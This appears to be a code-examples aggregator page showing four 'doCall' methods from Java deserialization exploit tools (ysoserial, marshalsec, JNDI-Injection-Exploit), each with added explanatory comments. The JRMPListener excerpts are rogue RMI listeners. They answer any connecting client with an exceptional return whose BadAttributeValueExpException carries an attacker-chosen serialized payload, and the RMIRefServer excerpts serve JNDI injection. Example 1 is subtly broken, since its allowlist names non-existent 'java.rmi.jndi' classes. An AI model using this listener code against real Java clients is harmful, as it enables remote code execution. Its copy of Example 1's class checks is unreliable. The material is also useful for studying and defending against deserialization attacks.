Java Code Examples for java.rmi.server.ObjID#hashCode()

The following examples show how to use java.rmi.server.ObjID#hashCode().
Example 1
Source File: RMIRefServer.java    From JNDI-Injection-Exploit with MIT License
/**
 * Handles one incoming call: reads the target {@link ObjID} from {@code in} and dispatches on
 * its object number.
 *
 * <p>Reading goes through an {@link ObjectInputStream} whose {@code resolveClass} acts as a
 * look-ahead allowlist: a class descriptor resolves only if its name equals one of the four
 * literals below, and every other descriptor aborts the read with an {@link IOException}
 * before any object of that class is instantiated.
 *
 * <p>{@code ObjID.hashCode()} is documented to return the identifier's object number, so the
 * values 2 and 0 line up with {@code ObjID.DGC_ID} and {@code ObjID.REGISTRY_ID}. The hash does
 * not cover the UID part of the identifier, so this is a match on the object number only and
 * not a full {@code equals} against the well-known identifiers.
 *
 * @param in  stream the call is read from
 * @param out stream handed to {@code handleRMI} for the reply
 * @throws MarshalException if the {@code ObjID} cannot be read
 * @throws Exception        whatever {@code handleDGC} / {@code handleRMI} propagate (not
 *                          visible in this excerpt)
 */
private void doCall ( DataInputStream in, DataOutputStream out ) throws Exception {
    ObjectInputStream ois = new ObjectInputStream(in) {

        @Override
        protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
            final String className = desc.getName();

            // NOTE(review): the JDK classes live in java.rmi.server (java.rmi.server.ObjID,
            // java.rmi.server.UID). The names compared here use a java.rmi.jndi prefix, so a
            // descriptor for the real JDK classes does not match the first three checks and
            // ends in the IOException below, i.e. the filter fails closed. Confirm whether
            // the prefix is intended.
            if ( "[Ljava.rmi.jndi.ObjID;".equals(className) ) {
                return ObjID[].class;
            }
            if ( "java.rmi.jndi.ObjID".equals(className) ) {
                return ObjID.class;
            }
            if ( "java.rmi.jndi.UID".equals(className) ) {
                return UID.class;
            }
            if ( "java.lang.String".equals(className) ) {
                return String.class;
            }

            // Default deny: anything not named above is refused.
            throw new IOException(getLocalTime() + " [RMISERVER]  >> Not allowed to read object");
        }
    };

    final ObjID targetId;
    try {
        targetId = ObjID.read(ois);
    }
    catch ( IOException e ) {
        // Keep the cause so the underlying stream failure stays visible to the caller.
        throw new MarshalException(getLocalTime() + " [RMISERVER]  >> unable to read objID", e);
    }

    final int objNum = targetId.hashCode();

    if ( objNum == 2 ) {
        // Object number 2: distributed garbage collector call.
        handleDGC(ois);
        return;
    }

    // Object number 0: registry call. Only a call that handleRMI reports as handled marks
    // the connection and wakes the threads blocked on waitLock.
    if ( objNum == 0 && handleRMI(ois, out) ) {
        this.hadConnection = true;
        synchronized ( this.waitLock ) {
            this.waitLock.notifyAll();
        }
    }
}
 
Example 2
Source File: JRMPListener.java    From ysoserial-modified with MIT License
/**
 * Answers one incoming call: reads the target {@link ObjID} from {@code in}, then writes an
 * exceptional return to {@code out} whose exception object carries {@code payload}.
 *
 * <p>Inbound data is read through an {@link ObjectInputStream} whose {@code resolveClass} is a
 * look-ahead allowlist: only {@code ObjID[]}, {@code ObjID} and {@code UID} resolve, and any
 * other class descriptor aborts the read with an {@link IOException}. The listener therefore
 * never instantiates classes chosen by the connecting peer.
 *
 * <p>Defensive takeaway: the reply to a call can carry an arbitrary serialized object, as the
 * outbound half of this method shows. A process that opens connections to endpoints it does
 * not control needs its own deserialization filter (for example the JDK's
 * {@code jdk.serialFilter}) rather than relying on the remote side.
 *
 * @param in      stream the call is read from
 * @param out     stream the reply is written to
 * @param payload object placed into the {@code val} field of the returned exception
 * @throws MarshalException if the {@code ObjID} cannot be read
 * @throws Exception        for any other I/O or reflection failure while building the reply
 */
private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
    // Allowlisting stream for everything read from the peer.
    ObjectInputStream ois = new ObjectInputStream(in) {

        @Override
        protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
            // Exact-name matches only; the array descriptor needs its own entry.
            if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
                return ObjID[].class;
            } else if ("java.rmi.server.ObjID".equals(desc.getName())) {
                return ObjID.class;
            } else if ( "java.rmi.server.UID".equals(desc.getName())) {
                return UID.class;
            }
            // Default deny for every other class name.
            throw new IOException("Not allowed to read object");
        }
    };

    ObjID read;
    try {
        read = ObjID.read(ois);
    }
    catch ( java.io.IOException e ) {
        // Wrap with the original exception as cause.
        throw new MarshalException("unable to read objID", e);
    }

    
    // ObjID.hashCode() is documented to return the object number; 2 is ObjID.DGC_ID.
    // The UID part of the identifier is not compared.
    if ( read.hashCode() == 2 ) {
        ois.readInt(); // method field; value is read and discarded
        ois.readLong(); // hash field; value is read and discarded
        // readObject() goes through the allowlist above, so only an ObjID[] can be read here.
        System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
    }
    
    // The reply below is written for every call, not only for DGC calls.
    System.err.println("Sending return with payload for obj " + read);

    out.writeByte(TransportConstants.Return);// transport-level opcode for a return message
    // NOTE(review): MarshalOutputStream is defined in JRMPClient (not shown); presumably it
    // annotates written classes with classpathUrl. Confirm there.
    ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);

    // Mark the result as an exception rather than a normal value, followed by a fresh UID.
    oos.writeByte(TransportConstants.ExceptionalReturn);
    new UID().write(oos);

    // The exception is only a carrier: it is created with a null value and payload is then
    // stored in its "val" field. Reflections.setFieldValue is not shown; presumably it sets
    // the field reflectively.
    BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
    Reflections.setFieldValue(ex, "val", payload);
    oos.writeObject(ex);

    // Flush the object stream first, then the underlying data stream.
    oos.flush();
    out.flush();

    // Record that a peer was served and wake every thread waiting on waitLock.
    this.hadConnection = true;
    synchronized ( this.waitLock ) {
        this.waitLock.notifyAll();
    }
}
 
Example 3
Source File: RMIRefServer.java    From marshalsec with MIT License
/**
 * Reads the target {@link ObjID} of one incoming call from {@code in} and routes the call by
 * object number.
 *
 * <p>The {@link ObjectInputStream} used for reading overrides {@code resolveClass} as a
 * look-ahead allowlist: {@code ObjID[]}, {@code ObjID}, {@code UID} and {@code String} are the
 * only classes that resolve. Any other class descriptor fails with an {@link IOException}
 * before an instance is created, so the peer cannot choose which classes are deserialized.
 *
 * <p>Routing uses {@code ObjID.hashCode()}, which is documented to return the object number:
 * 2 corresponds to {@code ObjID.DGC_ID} and 0 to {@code ObjID.REGISTRY_ID}. The UID part of
 * the identifier is not part of the hash, so identifiers are matched by object number only.
 *
 * @param in  stream the call is read from
 * @param out stream handed to {@code handleRMI} for the reply
 * @throws MarshalException if the {@code ObjID} cannot be read
 * @throws Exception        whatever {@code handleDGC} / {@code handleRMI} propagate (not
 *                          visible in this excerpt)
 */
private void doCall ( DataInputStream in, DataOutputStream out ) throws Exception {
    ObjectInputStream ois = new ObjectInputStream(in) {

        @Override
        protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
            final String className = desc.getName();

            // Exact-name matches only; the array type needs its own descriptor entry.
            if ( "[Ljava.rmi.server.ObjID;".equals(className) ) {
                return ObjID[].class;
            }
            if ( "java.rmi.server.ObjID".equals(className) ) {
                return ObjID.class;
            }
            if ( "java.rmi.server.UID".equals(className) ) {
                return UID.class;
            }
            if ( "java.lang.String".equals(className) ) {
                return String.class;
            }

            // Default deny: anything not named above is refused.
            throw new IOException("Not allowed to read object");
        }
    };

    final ObjID targetId;
    try {
        targetId = ObjID.read(ois);
    }
    catch ( java.io.IOException e ) {
        // Keep the cause so the underlying stream failure stays visible to the caller.
        throw new MarshalException("unable to read objID", e);
    }

    final int objNum = targetId.hashCode();

    if ( objNum == 2 ) {
        // Object number 2: distributed garbage collector call.
        handleDGC(ois);
        return;
    }

    // Object number 0: registry call. Only a call that handleRMI reports as handled marks
    // the connection and wakes the threads blocked on waitLock.
    if ( objNum == 0 && handleRMI(ois, out) ) {
        this.hadConnection = true;
        synchronized ( this.waitLock ) {
            this.waitLock.notifyAll();
        }
    }
}
 
Example 4
Source File: JRMPListener.java    From ysoserial with MIT License
/**
 * Serves one incoming call: reads the target {@link ObjID} from {@code in} and replies on
 * {@code out} with an exceptional return that wraps {@code payload} in an exception object.
 *
 * <p>Everything read from the peer passes through an {@link ObjectInputStream} whose
 * {@code resolveClass} allows exactly three class names ({@code ObjID[]}, {@code ObjID},
 * {@code UID}) and throws an {@link IOException} for all others. This is the look-ahead
 * allowlist pattern: the class name is checked before any instance is created.
 *
 * <p>Defensive takeaway: nothing in the wire format limits what class a return value or
 * returned exception may be, so the reading side must apply its own deserialization filter
 * (for example the JDK's {@code jdk.serialFilter}) when the remote endpoint is not trusted.
 *
 * @param in      stream the call is read from
 * @param out     stream the reply is written to
 * @param payload object stored in the {@code val} field of the returned exception
 * @throws MarshalException if the {@code ObjID} cannot be read
 * @throws Exception        for any other I/O or reflection failure while building the reply
 */
private void doCall ( DataInputStream in, DataOutputStream out, Object payload ) throws Exception {
    // Inbound side: object stream restricted to an explicit allowlist of class names.
    ObjectInputStream ois = new ObjectInputStream(in) {

        @Override
        protected Class<?> resolveClass ( ObjectStreamClass desc ) throws IOException, ClassNotFoundException {
            // Names are compared literally; the array form has a separate descriptor name.
            if ( "[Ljava.rmi.server.ObjID;".equals(desc.getName())) {
                return ObjID[].class;
            } else if ("java.rmi.server.ObjID".equals(desc.getName())) {
                return ObjID.class;
            } else if ( "java.rmi.server.UID".equals(desc.getName())) {
                return UID.class;
            }
            // Anything else is rejected before it can be instantiated.
            throw new IOException("Not allowed to read object");
        }
    };

    ObjID read;
    try {
        read = ObjID.read(ois);
    }
    catch ( java.io.IOException e ) {
        // The original IOException is preserved as the cause.
        throw new MarshalException("unable to read objID", e);
    }


    // hashCode() of an ObjID is documented as its object number; 2 matches ObjID.DGC_ID.
    // Only the object number is checked, not the UID part of the identifier.
    if ( read.hashCode() == 2 ) {
        ois.readInt(); // method field; consumed and ignored
        ois.readLong(); // hash field; consumed and ignored
        // The cast is backed by the allowlist: no class other than ObjID[] can be resolved here.
        System.err.println("Is DGC call for " + Arrays.toString((ObjID[])ois.readObject()));
    }

    // From here on the same reply is produced regardless of which object was addressed.
    System.err.println("Sending return with payload for obj " + read);

    out.writeByte(TransportConstants.Return);// transport-level opcode for a return message
    // NOTE(review): JRMPClient.MarshalOutputStream is not part of this excerpt; it presumably
    // uses classpathUrl when annotating written classes. Verify in JRMPClient.
    ObjectOutputStream oos = new JRMPClient.MarshalOutputStream(out, this.classpathUrl);

    // Result type "exceptional return", then a newly generated UID.
    oos.writeByte(TransportConstants.ExceptionalReturn);
    new UID().write(oos);

    // The exception is built with a null value and payload is then placed in its "val"
    // field. Reflections.setFieldValue is defined elsewhere; presumably a reflective setter.
    BadAttributeValueExpException ex = new BadAttributeValueExpException(null);
    Reflections.setFieldValue(ex, "val", payload);
    oos.writeObject(ex);

    // Object stream is flushed before the data stream it wraps.
    oos.flush();
    out.flush();

    // Flag that a connection was handled and release all threads waiting on waitLock.
    this.hadConnection = true;
    synchronized ( this.waitLock ) {
        this.waitLock.notifyAll();
    }
}